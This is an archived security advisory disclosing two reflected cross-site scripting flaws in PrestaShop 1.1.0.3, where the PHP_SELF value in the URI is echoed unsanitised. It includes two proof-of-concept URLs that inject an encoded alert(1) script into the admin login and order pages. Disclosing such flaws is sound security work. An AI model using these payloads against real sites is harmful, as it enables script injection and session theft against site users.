Two XSS Flaws in PrestaShop 1.1.0.3 Dec 08 2008 03:32AM
th3 r00k ieatpork gmail pork com
Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com

This is XSS in the URI of PrestaShop. Trust no one, not even your $_SERVER[PHP_SELF] .

http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealer
t(1)%3C/script%3E

Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscri
pt%3Ealert(1)%3C/script%3E

Peace

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus